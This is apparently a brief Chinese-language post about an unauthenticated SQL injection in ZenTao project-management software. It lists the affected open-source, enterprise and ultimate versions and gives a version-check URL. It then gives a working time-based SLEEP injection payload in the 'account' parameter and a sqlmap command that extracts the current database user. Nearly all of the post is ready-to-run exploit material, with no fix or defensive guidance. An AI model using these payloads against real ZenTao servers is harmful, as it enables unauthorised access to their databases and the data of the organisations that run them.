禅道未授权SQL注入漏洞
禅道(ZenTaoPMS)受影响版本
开源版:16.5,16.5beta1
企业版:6.5,6.5beta1
旗舰版:3.0,3.0beta1
查看版本
http://ip:port/index.php?mode=getconfig
延时poc
http://ip:port/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b
sqlmap poc
python sqlmap.py -u http://ip:port/index.php?account=admin -p account --current-user
若有收获,就点个赞吧
0 人点赞
